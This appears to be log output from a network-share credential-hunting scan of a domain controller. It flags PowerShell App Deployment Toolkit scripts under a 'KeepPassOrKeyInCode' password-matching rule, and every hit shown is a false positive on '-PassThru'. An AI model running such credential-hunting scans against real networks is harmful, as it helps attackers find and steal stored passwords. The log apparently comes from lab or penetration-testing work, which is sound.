\ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ PSADT\.Types\.ProcessResult\n\n\ \ \ \ \ \ \ \ Returns\ an\ object\ with\ the\ results\ of\ the\ installation\ if\ -PassThru\ is\ specified\.\n\ \ \ \ \ \ \ \ -\ ExitCode\n\ \ \ \ \ \ \ \ -\ StdOut\n\ \ \ \ \ \ \ \ -\ StdErr\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Start-ADTMsiProcess\ -Action\ 'Install'\ -FilePath\ 'Adobe_FlashPlayer_11\.2\.202\.233_x64_EN\.msi'\n\n\ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|28.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Start-ADTProcess.ps1) \ folder\.\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ PSADT\.Types\.ProcessResult\n\n\ \ \ \ \ \ \ \ Returns\ an\ object\ with\ the\ results\ of\ the\ installation\ if\ -PassThru\ is\ specified\.\n\ \ \ \ \ \ \ \ -\ ExitCode\n\ \ \ \ \ \ \ \ -\ StdOut\n\ \ \ \ \ \ \ \ -\ StdErr\n\n\ \ \ \ \.NOTES\n\ \ \ \ \ \ \ \ An\ active\ ADT\ session\ is\ NOT\ required\ to\ use\ this\ function\.\n\n\ \ \ \ \ \ \ \ Tags:\ psadt\n\ \ \ \ \ \ \ \ Website:\ http [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Test-ADTServiceExists.ps1) \ for\ the\ service\.\ This\ is\ useful\ for\ compatibility\ with\ PSADT\ v3\.x\.\n\n\ \ \ \ \.PARAMETER\ PassThru\n\ \ \ \ \ \ \ \ Return\ the\ WMI\ service\ object\.\ To\ see\ all\ the\ properties\ use:\ Test-ADTServiceExists\ -Name\ 'spooler'\ -PassThru\ \|\ Get-Member\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ System\.Boolean\n\n\ \ \ \ \ \ \ \ Returns\ \$true\ if\ the\ service\ exists,\ otherwise\ return [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|5.6kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Write-ADTLogEntry.ps1) \.\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ System\.String\n\n\ \ \ \ \ \ \ \ The\ message\ to\ write\ to\ the\ log\ file\ or\ output\ to\ the\ console\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ System\.String\[]\n\n\ \ \ \ \ \ \ \ This\ function\ returns\ the\ provided\ output\ if\ -PassThru\ is\ specified\.\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Write-ADTLogEntry\ -Message\ "Installing\ patch\ MS15-031"\ -Source\ 'Add-Patch'\n\n\ \ \ \ \ \ \ \ Writes\ a\ log\ entry\ indicating\ that\ patch\ MS15-031\ is\ being\ installed\. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|15.1kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Uninstall-ADTApplication.ps1) his\ function\ can\ receive\ one\ or\ more\ InstalledApplication\ objects\ for\ uninstallation\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ PSADT\.Types\.ProcessResult\n\n\ \ \ \ \ \ \ \ Returns\ an\ object\ with\ the\ results\ of\ the\ installation\ if\ -PassThru\ is\ specified\.\n\ \ \ \ \ \ \ \ -\ ExitCode\n\ \ \ \ \ \ \ \ -\ StdOut\n\ \ \ \ \ \ \ \ -\ StdErr\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Uninstall-ADTApplication\ -Name\ 'Acrobat'\ -ApplicationType\ 'MSI'\ -FilterScript\ \{\ \$_\.Publisher\ -match\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:17Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|16.4kB|2025-05-01 16:09:18Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\Tests\Unit\Copy-ADTFile.Tests.ps1) Out-Null\n\n\ \ \ \ \ \ \ \ Set-Content\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Value\ 'old\ file'\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Name\ LastWriteTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\ -PassThru\ \|\ Set-ItemProperty\ -Name\ CreationTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\hidden\.txt"\ -Name\ Attributes\ -Value\ 'Hidden'\n\ \ \ \ \ \ \ \ Set-ItemPrope [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|13kB|2025-05-01 16:09:18Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\Tests\Unit.Inactive\Execute-ProcessAsUser.Tests.ps1) ilentlyContinue\ \|\ Out-Null\n\ \ \ \ }\n\n\ \ \ \ Context\ 'cmd\.exe'\ \{\n\ \ \ \ \ \ \ \ It\ 'Should\ run\ cmd\.exe'\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \$ProcessExitCode\ =\ Execute-ProcessAsUser\ -Path\ 'cmd\.exe'\ -Parameters\ '/c\ echo\ Hello\ World'\ -Wait\ -PassThru\n\ \ \ \ \ \ \ \ \ \ \ \ \$ProcessExitCode\ \|\ Should\ -Be\ 0\n\ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ It\ 'Should\ return\ exit\ codes'\ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \$ProcessExitCode\ =\ Execute-ProcessAsUser\ -Path\ 'cmd\.exe'\ -Parameters\ '/c\ exit\ 42'\ - [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|16.6kB|2025-05-01 16:09:18Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\Tests\Unit.Inactive\Copy-File.Tests.ps1) Out-Null\n\n\ \ \ \ \ \ \ \ Set-Content\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Value\ 'old\ file'\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\old\.txt"\ -Name\ LastWriteTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\ -PassThru\ \|\ Set-ItemProperty\ -Name\ CreationTime\ -Value\ \(Get-Date\)\.AddDays\(-1\)\n\ \ \ \ \ \ \ \ Set-ItemProperty\ -Path\ "\$SourcePath\\Subfolder3\\hidden\.txt"\ -Name\ Attributes\ -Value\ 'Hidden'\n\ \ \ \ \ \ \ \ Set-ItemPrope [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|3.3kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Private\Get-ADTRunningProcesses.ps1) ts\.Name\ -ErrorAction\ Ignore\ \|\ &\ \{\n\ \ \ \ \ \ \ \ process\n\ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\$_\.HasExited\)\n\ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ return\ \$_\ \|\ Add-Member\ -MemberType\ NoteProperty\ -Name\ ProcessDescription\ -Force\ -PassThru\ -Value\ \$\(\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(!\[System\.String]::IsNullOrWhiteSpace\(\(\$objDescription\ =\ \$ProcessObjects\ \|\ Where-Object\ -Property\ Name\ -EQ\ -Value\ \$_\.ProcessName\ \|\ Select-Object\ -ExpandProp [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|5.3kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Private\Invoke-ADTServiceAndDependencyOperation.ps1) \ Stop\ the\ parent\ service\.\n\ \ \ \ \ \ \ \ Write-ADTLogEntry\ -Message\ "Stopping\ parent\ service\ \[\$\(\$Service\.ServiceName\)]\ with\ display\ name\ \[\$\(\$Service\.DisplayName\)]\."\n\ \ \ \ \ \ \ \ \$Service\ =\ \$Service\ \|\ Stop-Service\ -PassThru\ -WarningAction\ Ignore\ -Force\n\ \ \ \ }\n\ \ \ \ elseif\ \(\(\$Operation\ -eq\ 'Start'\)\ -and\ \(\$Service\.Status\ -ne\ 'Running'\)\)\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \#\ Start\ the\ parent\ service\.\n\ \ \ \ \ \ \ \ Write-ADTLogEntry\ -Message\ "S [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|2.8kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Private\Show-ADTHelpConsoleInternal.ps1) \ Import\ the\ module\ and\ store\ its\ passthru\ data\ so\ we\ can\ access\ it\ later\.\n\ \ \ \ \$module\ =\ Import-Module\ -FullyQualifiedName\ \(\[Microsoft\.PowerShell\.Commands\.ModuleSpecification]::new\(\$PSBoundParameters\)\)\ -PassThru\n\n\ \ \ \ \#\ Build\ out\ the\ form's\ listbox\.\n\ \ \ \ \$helpListBox\ =\ \[System\.Windows\.Forms\.ListBox]::new\(\)\n\ \ \ \ \$helpListBox\.ClientSize\ =\ \[System\.Drawing\.Size]::new\(261,\ 675\)\n\ \ \ \ \$helpListBox\.Font\ =\ \[Sys [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|8kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Block-ADTAppExecution.ps1) \(\$Script:PSScriptRoot\)\\\$\(\$MyInvocation\.MyCommand\.Module\.Name\)\.psd1"\.Replace\("'",\ "''"\)\)';\ Guid\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Guid\)';\ ModuleVersion\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Version\)'\ }\ -PassThru\)\ \{\ &\ `\$CommandTable\.'Initialize-ADTModule'\ -ScriptDirectory\ '\$\(\$Script:ADT\.Directories\.Script\.Replace\("'",\ "''"\)\)';\ `\$null\ =\ &\ `\$CommandTable\.'Show-ADTInstallationPrompt\$\(\$adtConfig\.UI\.Dial [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|24.5kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Copy-ADTFile.ps1) ntry\ -Message\ "Executing\ Robocopy\ command:\ \$robocopyCommand\ \$robocopyArgs"\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$robocopyResult\ =\ Start-ADTProcess\ -FilePath\ \$robocopyCommand\ -ArgumentList\ \$robocopyArgs\ -CreateNoWindow\ -PassThru\ -SuccessExitCodes\ 0,\ 1,\ 2,\ 3,\ 4,\ 5,\ 6,\ 7,\ 8\ -ErrorAction\ Ignore\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Trim\ the\ last\ line\ plus\ leading\ whitespace\ from\ each\ line\ of\ Robocopy\ output\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$rob [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.9kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Add-ADTEdgeExtension.ps1) ert\ the\ result\ back\ to\ JSON\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$extensionsSettings\ =\ Get-ADTEdgeExtensions\ \|\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Add-Member\ -Name\ \$ExtensionID\ -Value\ \$additionalExtension\ -MemberType\ NoteProperty\ -Force\ -PassThru\ \|\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ ConvertTo-Json\ -Compress\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Add\ the\ additional\ extension\ to\ the\ current\ values,\ then\ re-write\ the\ definition\ in\ the\ registry\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$null\ =\ S [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:18Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Get-ADTPEFileArchitecture.ps1) cture\ of\ \[\$peArchEnum]\."\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\$PassThru\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ return\ \(\$Path\ \|\ Add-Member\ -MemberType\ NoteProperty\ -Name\ BinaryType\ -Value\ \$peArchEnum\ -Force\ -PassThru\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ return\ \$peArchEnum\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ catch\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Write-Error\ -ErrorRecord\ \$_\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ }\n\ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|7.7kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Invoke-ADTRegSvr32.ps1) \ \ }\n\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \#\ Register\ the\ DLL\ file\ and\ measure\ the\ success\.\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\(\$ExecuteResult\ =\ Start-ADTProcess\ -FilePath\ \$RegSvr32Path\ -ArgumentList\ \$ActionParameters\ -WindowStyle\ Hidden\ -PassThru\)\.ExitCode\ -ne\ 0\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ if\ \(\$ExecuteResult\.ExitCode\ -eq\ 60002\)\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \$naerParams\ =\ @\{\n\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ Exce [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|17.6kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Open-ADTSession.ps1) nal\ arguments\ passed\ to\ the\ function\.\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ ADTSession\n\n\ \ \ \ \ \ \ \ This\ function\ returns\ the\ session\ object\ if\ -PassThru\ is\ specified\.\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ -DeploymentType\ "Install"\ -DeployMode\ "Interactive"\n\n\ \ \ \ \ \ \ \ Opens\ a\ new\ ADT\ session\ with\ th [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|9.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Show-ADTInstallationRestartPrompt.ps1) \(\$Script:PSScriptRoot\)\\\$\(\$MyInvocation\.MyCommand\.Module\.Name\)\.psd1"\.Replace\("'",\ "''"\)\)';\ Guid\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Guid\)';\ ModuleVersion\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Version\)'\ }\ -PassThru\)\ \{\ &\ `\$CommandTable\.'Initialize-ADTModule'\ -ScriptDirectory\ '\$\(\$Script:ADT\.Directories\.Script\.Replace\("'",\ "''"\)\)';\ `\$null\ =\ &\ `\$CommandTable\.'\$\(\$MyInvocation\.MyCommand\.Name\)\$\(\$adtConfig\.UI [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|10.8kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Show-ADTInstallationPrompt.ps1) \(\$Script:PSScriptRoot\)\\\$\(\$MyInvocation\.MyCommand\.Module\.Name\)\.psd1"\.Replace\("'",\ "''"\)\)';\ Guid\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Guid\)';\ ModuleVersion\ =\ '\$\(\$MyInvocation\.MyCommand\.Module\.Version\)'\ }\ -PassThru\)\ \{\ &\ `\$CommandTable\.'Initialize-ADTModule'\ -ScriptDirectory\ '\$\(\$Script:ADT\.Directories\.Script\.Replace\("'",\ "''"\)\)';\ `\$null\ =\ &\ `\$CommandTable\.'\$\(\$MyInvocation\.MyCommand\.Name\)\$\(\$adtConfig\.UI [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|25.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Start-ADTMsiProcess.ps1) :\ \$false\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ PSADT\.Types\.ProcessResult\n\n\ \ \ \ \ \ \ \ Returns\ an\ object\ with\ the\ results\ of\ the\ installation\ if\ -PassThru\ is\ specified\.\n\ \ \ \ \ \ \ \ -\ ExitCode\n\ \ \ \ \ \ \ \ -\ StdOut\n\ \ \ \ \ \ \ \ -\ StdErr\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Start-ADTMsiProcess\ -Action\ 'Install'\ -FilePath\ 'Adobe_FlashPlayer_11\.2\.202\.233_x64_EN\.msi'\n\n\ \ \ \ \ \ \ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|28.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Start-ADTProcess.ps1) \ folder\.\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ PSADT\.Types\.ProcessResult\n\n\ \ \ \ \ \ \ \ Returns\ an\ object\ with\ the\ results\ of\ the\ installation\ if\ -PassThru\ is\ specified\.\n\ \ \ \ \ \ \ \ -\ ExitCode\n\ \ \ \ \ \ \ \ -\ StdOut\n\ \ \ \ \ \ \ \ -\ StdErr\n\n\ \ \ \ \.NOTES\n\ \ \ \ \ \ \ \ An\ active\ ADT\ session\ is\ NOT\ required\ to\ use\ this\ function\.\n\n\ \ \ \ \ \ \ \ Tags:\ psadt\n\ \ \ \ \ \ \ \ Website:\ http [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|6.8kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Test-ADTBattery.ps1) ests\ whether\ the\ local\ machine\ is\ running\ on\ AC\ power\ or\ not\.\n\n\ \ \ \ \.DESCRIPTION\n\ \ \ \ \ \ \ \ Tests\ whether\ the\ local\ machine\ is\ running\ on\ AC\ power\ and\ returns\ true/false\.\ For\ detailed\ information,\ use\ the\ -PassThru\ option\ to\ get\ a\ hashtable\ containing\ various\ battery\ and\ power\ status\ properties\.\n\n\ \ \ \ \.PARAMETER\ PassThru\n\ \ \ \ \ \ \ \ Outputs\ a\ hashtable\ containing\ the\ following\ properties:\n\ \ \ \ \ \ \ \ -\ IsLapto [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|15.1kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Uninstall-ADTApplication.ps1) his\ function\ can\ receive\ one\ or\ more\ InstalledApplication\ objects\ for\ uninstallation\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ PSADT\.Types\.ProcessResult\n\n\ \ \ \ \ \ \ \ Returns\ an\ object\ with\ the\ results\ of\ the\ installation\ if\ -PassThru\ is\ specified\.\n\ \ \ \ \ \ \ \ -\ ExitCode\n\ \ \ \ \ \ \ \ -\ StdOut\n\ \ \ \ \ \ \ \ -\ StdErr\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Uninstall-ADTApplication\ -Name\ 'Acrobat'\ -ApplicationType\ 'MSI'\ -FilterScript\ \{\ \$_\.Publisher\ -match\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|4.2kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Test-ADTServiceExists.ps1) \ for\ the\ service\.\ This\ is\ useful\ for\ compatibility\ with\ PSADT\ v3\.x\.\n\n\ \ \ \ \.PARAMETER\ PassThru\n\ \ \ \ \ \ \ \ Return\ the\ WMI\ service\ object\.\ To\ see\ all\ the\ properties\ use:\ Test-ADTServiceExists\ -Name\ 'spooler'\ -PassThru\ \|\ Get-Member\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ None\n\n\ \ \ \ \ \ \ \ You\ cannot\ pipe\ objects\ to\ this\ function\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ System\.Boolean\n\n\ \ \ \ \ \ \ \ Returns\ \$true\ if\ the\ service\ exists,\ otherwise\ return [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:19Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|5.6kB|2025-05-01 16:09:17Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Public\Write-ADTLogEntry.ps1) \.\n\n\ \ \ \ \.INPUTS\n\ \ \ \ \ \ \ \ System\.String\n\n\ \ \ \ \ \ \ \ The\ message\ to\ write\ to\ the\ log\ file\ or\ output\ to\ the\ console\.\n\n\ \ \ \ \.OUTPUTS\n\ \ \ \ \ \ \ \ System\.String\[]\n\n\ \ \ \ \ \ \ \ This\ function\ returns\ the\ provided\ output\ if\ -PassThru\ is\ specified\.\n\n\ \ \ \ \.EXAMPLE\n\ \ \ \ \ \ \ \ Write-ADTLogEntry\ -Message\ "Installing\ patch\ MS15-031"\ -Source\ 'Add-Patch'\n\n\ \ \ \ \ \ \ \ Writes\ a\ log\ entry\ indicating\ that\ patch\ MS15-031\ is\ being\ installed\. [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:24Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|11.3kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Frontend\v4\Invoke-AppDeployToolkit.ps1) \n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$iadtParams\ =\ Get-ADTBoundParametersAndDefaultValues\ -Invocation\ \$MyInvocation\n\ \ \ \ \ \ \ \ \$adtSession\ =\ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ @adtSession\ @iadtParams\ -PassThru\n\ \ \ \ }\n\ \ \ \ catch\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ Remove-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\ \ \ \ \ \ \ \ throw\n\ \ \ \ }\n}\ncatch\n\{\n\ \ \ \ \$Host\.UI\.WriteErrorLine\(\(Out-String\ -InputObject\ \$_\ -Width\ \(\[System\.Int32]::Ma [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:27Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|11.3kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\C$\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Frontend\v4\Invoke-AppDeployToolkit.ps1) \n\ \ \ \ \{\n\ \ \ \ \ \ \ \ \$iadtParams\ =\ Get-ADTBoundParametersAndDefaultValues\ -Invocation\ \$MyInvocation\n\ \ \ \ \ \ \ \ \$adtSession\ =\ Open-ADTSession\ -SessionState\ \$ExecutionContext\.SessionState\ @adtSession\ @iadtParams\ -PassThru\n\ \ \ \ }\n\ \ \ \ catch\n\ \ \ \ \{\n\ \ \ \ \ \ \ \ Remove-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\ \ \ \ \ \ \ \ throw\n\ \ \ \ }\n}\ncatch\n\{\n\ \ \ \ \$Host\.UI\.WriteErrorLine\(\(Out-String\ -InputObject\ \$_\ -Width\ \(\[System\.Int32]::Ma [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:30Z [File] {Red}<KeepPassOrKeyInCode|R|[\s]+-passw?o?r?d?|174.5kB|2025-05-01 16:09:16Z>(\\DC01.inlanefreight.local\IT\Tools\PSAppDeployToolkit-main\src\PSAppDeployToolkit\Frontend\v3\AppDeployToolkit\AppDeployToolkitMain.ps1) move-Module\ -Name\ PSAppDeployToolkit\*\ -Force\n\$adtModule\ =\ Import-Module\ -FullyQualifiedName\ @\{\ ModuleName\ =\ \$moduleName;\ Guid\ =\ '8c3c366b-8606-4576-9f2d-4051144f7ca2';\ ModuleVersion\ =\ '4\.0\.5'\ }\ -Force\ -PassThru\ -ErrorAction\ Stop\n\n\#\ Get\ all\ parameters\ from\ Open-ADTSession\ that\ are\ considered\ frontend\ params/variables\.\n\$sessionVars\ =\ \$adtModule\.ExportedCommands\.'Open-ADTSession'\.Parameters\.Values\ \|\ [INLANEFREIGHT\mendres@DC01] 2026-08-12 15:44:33Z 